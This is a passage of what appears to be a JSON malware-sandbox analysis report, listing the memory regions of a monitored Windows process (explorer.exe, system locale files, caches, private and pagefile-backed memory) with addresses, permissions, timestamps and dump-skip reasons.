421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1093", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:01:06.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_1094", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:06.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_1095", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:01:06.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_1096", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": 
"00:01:06.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_1097", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:01:06.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1179647, "entry_point": 0, "filename": null, "id": "region_1098", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:01:06.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_1099", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:01:06.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1245184, 
"type": "region", "version": 1 }, "end_va": 1253375, "entry_point": 0, "filename": null, "id": "region_1100", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:06.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_1101", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:01:06.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1384447, "entry_point": 0, "filename": null, "id": "region_1102", "name": "pagefile_0x0000000000150000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1376256, "timestamp": "00:01:06.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_1103", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:01:06.704", "type": "region", "version": 1 }, { "dump": { "filename": "", 
"flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_1104", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:01:06.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_1105", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:01:06.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 3080191, "entry_point": 0, "filename": null, "id": "region_1106", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:01:06.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3899391, "entry_point": 0, "filename": 
null, "id": "region_1107", "name": "pagefile_0x00000000002f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3080192, "timestamp": "00:01:06.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 135168, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 4067327, "entry_point": 0, "filename": null, "id": "region_1108", "name": "private_0x00000000003c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3932160, "timestamp": "00:01:06.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4259839, "entry_point": 0, "filename": null, "id": "region_1109", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:01:06.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4263935, "entry_point": 0, "filename": null, "id": "region_1110", "name": "pagefile_0x0000000000410000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4259840, "timestamp": "00:01:06.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created 
because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4333567, "entry_point": 0, "filename": null, "id": "region_1111", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:01:06.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4399103, "entry_point": 0, "filename": null, "id": "region_1112", "name": "pagefile_0x0000000000430000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4390912, "timestamp": "00:01:06.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4460543, "entry_point": 0, "filename": null, "id": "region_1113", "name": "private_0x0000000000440000", "norm_filename": null, "region_type": "private_memory", "start_va": 4456448, "timestamp": "00:01:06.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 4526079, "entry_point": 0, "filename": null, "id": "region_1114", "name": "private_0x0000000000450000", 
"norm_filename": null, "region_type": "private_memory", "start_va": 4521984, "timestamp": "00:01:06.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 4653055, "entry_point": 0, "filename": null, "id": "region_1115", "name": "private_0x0000000000460000", "norm_filename": null, "region_type": "private_memory", "start_va": 4587520, "timestamp": "00:01:06.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 5705727, "entry_point": 0, "filename": null, "id": "region_1116", "name": "pagefile_0x0000000000470000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4653056, "timestamp": "00:01:06.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 6815743, "entry_point": 0, "filename": null, "id": "region_1117", "name": "private_0x0000000000580000", "norm_filename": null, "region_type": "private_memory", "start_va": 5767168, "timestamp": "00:01:06.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", 
"permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 6815744, "type": "region", "version": 1 }, "end_va": 7729151, "entry_point": 0, "filename": null, "id": "region_1118", "name": "pagefile_0x0000000000680000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6815744, "timestamp": "00:01:06.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 7733248, "type": "region", "version": 1 }, "end_va": 7995391, "entry_point": 0, "filename": null, "id": "region_1119", "name": "private_0x0000000000760000", "norm_filename": null, "region_type": "private_memory", "start_va": 7733248, "timestamp": "00:01:06.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 7995392, "type": "region", "version": 1 }, "end_va": 8003583, "entry_point": 0, "filename": null, "id": "region_1120", "name": "pagefile_0x00000000007a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7995392, "timestamp": "00:01:06.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 8060928, "type": "region", "version": 1 }, "end_va": 8069119, "entry_point": 0, "filename": null, "id": "region_1121", "name": "pagefile_0x00000000007b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 
8060928, "timestamp": "00:01:06.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8126464, "type": "region", "version": 1 }, "end_va": 8130559, "entry_point": 0, "filename": null, "id": "region_1122", "name": "private_0x00000000007c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8126464, "timestamp": "00:01:06.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8192000, "type": "region", "version": 1 }, "end_va": 8454143, "entry_point": 0, "filename": null, "id": "region_1123", "name": "private_0x00000000007d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8192000, "timestamp": "00:01:06.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 8454144, "type": "region", "version": 1 }, "end_va": 8466431, "entry_point": 8454144, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui", "id": "region_1124", "name": "comctl32.dll.mui", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui", "region_type": "memory_mapped_file", "start_va": 8454144, "timestamp": "00:01:06.709", "type": "region", "version": 1 }, { "dump": { "filename": "", 
"flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8519680, "type": "region", "version": 1 }, "end_va": 8523775, "entry_point": 0, "filename": null, "id": "region_1125", "name": "private_0x0000000000820000", "norm_filename": null, "region_type": "private_memory", "start_va": 8519680, "timestamp": "00:01:06.709", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 172032, "start_va": 8585216, "type": "region", "version": 1 }, "end_va": 8757247, "entry_point": 0, "filename": null, "id": "region_1126", "name": "private_0x0000000000830000", "norm_filename": null, "region_type": "private_memory", "start_va": 8585216, "timestamp": "00:01:06.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 36864, "start_va": 8781824, "type": "region", "version": 1 }, "end_va": 8818687, "entry_point": 0, "filename": null, "id": "region_1127", "name": "private_0x0000000000860000", "norm_filename": null, "region_type": "private_memory", "start_va": 8781824, "timestamp": "00:01:06.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 8847360, "type": "region", "version": 1 }, "end_va": 8880127, "entry_point": 0, 
"filename": null, "id": "region_1128", "name": "private_0x0000000000870000", "norm_filename": null, "region_type": "private_memory", "start_va": 8847360, "timestamp": "00:01:06.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8912896, "type": "region", "version": 1 }, "end_va": 8916991, "entry_point": 0, "filename": null, "id": "region_1129", "name": "pagefile_0x0000000000880000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8912896, "timestamp": "00:01:06.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 8978432, "type": "region", "version": 1 }, "end_va": 8994815, "entry_point": 8978432, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1130", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 8978432, "timestamp": "00:01:06.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 540672, "start_va": 9043968, "type": "region", "version": 1 }, "end_va": 9584639, "entry_point": 0, "filename": null, "id": "region_1131", "name": "private_0x00000000008a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 9043968, "timestamp": "00:01:06.713", "type": "region", "version": 1 }, { "dump": { "filename": "", 
"flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2625536, "start_va": 9633792, "type": "region", "version": 1 }, "end_va": 12259327, "entry_point": 9633792, "filename": "\\Windows\\explorer.exe", "id": "region_1132", "name": "explorer.exe", "norm_filename": "c:\\windows\\explorer.exe", "region_type": "memory_mapped_file", "start_va": 9633792, "timestamp": "00:01:06.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 12320768, "type": "region", "version": 1 }, "end_va": 24903679, "entry_point": 0, "filename": null, "id": "region_1133", "name": "pagefile_0x0000000000bc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12320768, "timestamp": "00:01:06.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 24903680, "type": "region", "version": 1 }, "end_va": 29044735, "entry_point": 0, "filename": null, "id": "region_1134", "name": "pagefile_0x00000000017c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 24903680, "timestamp": "00:01:06.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 29097984, "type": "region", "version": 1 }, "end_va": 32043007, "entry_point": 29097984, "filename": 
"\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1135", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 29097984, "timestamp": "00:01:06.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 442368, "start_va": 32047104, "type": "region", "version": 1 }, "end_va": 32489471, "entry_point": 0, "filename": null, "id": "region_1136", "name": "private_0x0000000001e90000", "norm_filename": null, "region_type": "private_memory", "start_va": 32047104, "timestamp": "00:01:06.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_1137", "name": "private_0x0000000001f00000", "norm_filename": null, "region_type": "private_memory", "start_va": 32505856, "timestamp": "00:01:06.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 151552, "start_va": 33554432, "type": "region", "version": 1 }, "end_va": 33705983, "entry_point": 33554432, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db", "id": "region_1138", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db", "norm_filename": 
"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db", "region_type": "memory_mapped_file", "start_va": 33554432, "timestamp": "00:01:06.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 33751040, "type": "region", "version": 1 }, "end_va": 33767423, "entry_point": 33751040, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1139", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 33751040, "timestamp": "00:01:06.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 33816576, "type": "region", "version": 1 }, "end_va": 33824767, "entry_point": 0, "filename": null, "id": "region_1140", "name": "pagefile_0x0000000002040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33816576, "timestamp": "00:01:06.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 33882112, "type": "region", "version": 1 }, "end_va": 33947647, "entry_point": 0, "filename": null, "id": "region_1141", "name": "private_0x0000000002050000", "norm_filename": null, "region_type": "private_memory", "start_va": 33882112, "timestamp": "00:01:06.759", "type": "region", 
"version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 33947648, "type": "region", "version": 1 }, "end_va": 34471935, "entry_point": 0, "filename": null, "id": "region_1142", "name": "private_0x0000000002060000", "norm_filename": null, "region_type": "private_memory", "start_va": 33947648, "timestamp": "00:01:06.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 34471936, "type": "region", "version": 1 }, "end_va": 34668543, "entry_point": 34471936, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db", "id": "region_1143", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db", "region_type": "memory_mapped_file", "start_va": 34471936, "timestamp": "00:01:06.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 34668544, "type": "region", "version": 1 }, "end_va": 34676735, "entry_point": 0, "filename": null, "id": "region_1144", "name": "pagefile_0x0000000002110000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 34668544, "timestamp": "00:01:06.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], 
"info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 34734080, "type": "region", "version": 1 }, "end_va": 34996223, "entry_point": 0, "filename": null, "id": "region_1145", "name": "private_0x0000000002120000", "norm_filename": null, "region_type": "private_memory", "start_va": 34734080, "timestamp": "00:01:06.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 34996224, "type": "region", "version": 1 }, "end_va": 35000319, "entry_point": 0, "filename": null, "id": "region_1146", "name": "private_0x0000000002160000", "norm_filename": null, "region_type": "private_memory", "start_va": 34996224, "timestamp": "00:01:06.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 35061760, "type": "region", "version": 1 }, "end_va": 35078143, "entry_point": 0, "filename": null, "id": "region_1147", "name": "private_0x0000000002170000", "norm_filename": null, "region_type": "private_memory", "start_va": 35061760, "timestamp": "00:01:06.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 35127296, "type": "region", "version": 1 }, "end_va": 35143679, "entry_point": 0, "filename": null, "id": "region_1148", 
"name": "private_0x0000000002180000", "norm_filename": null, "region_type": "private_memory", "start_va": 35127296, "timestamp": "00:01:06.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 35192832, "type": "region", "version": 1 }, "end_va": 35201023, "entry_point": 0, "filename": null, "id": "region_1149", "name": "pagefile_0x0000000002190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 35192832, "timestamp": "00:01:06.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35258368, "type": "region", "version": 1 }, "end_va": 35262463, "entry_point": 0, "filename": null, "id": "region_1150", "name": "private_0x00000000021a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35258368, "timestamp": "00:01:06.764", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35323904, "type": "region", "version": 1 }, "end_va": 35327999, "entry_point": 0, "filename": null, "id": "region_1151", "name": "private_0x00000000021b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35323904, "timestamp": "00:01:06.764", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the 
total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 35389440, "type": "region", "version": 1 }, "end_va": 35405823, "entry_point": 0, "filename": null, "id": "region_1152", "name": "private_0x00000000021c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35389440, "timestamp": "00:01:06.765", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35454976, "type": "region", "version": 1 }, "end_va": 35459071, "entry_point": 0, "filename": null, "id": "region_1153", "name": "private_0x00000000021d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35454976, "timestamp": "00:01:06.765", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35520512, "type": "region", "version": 1 }, "end_va": 35524607, "entry_point": 0, "filename": null, "id": "region_1154", "name": "private_0x00000000021e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35520512, "timestamp": "00:01:06.765", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35586048, "type": "region", "version": 1 }, "end_va": 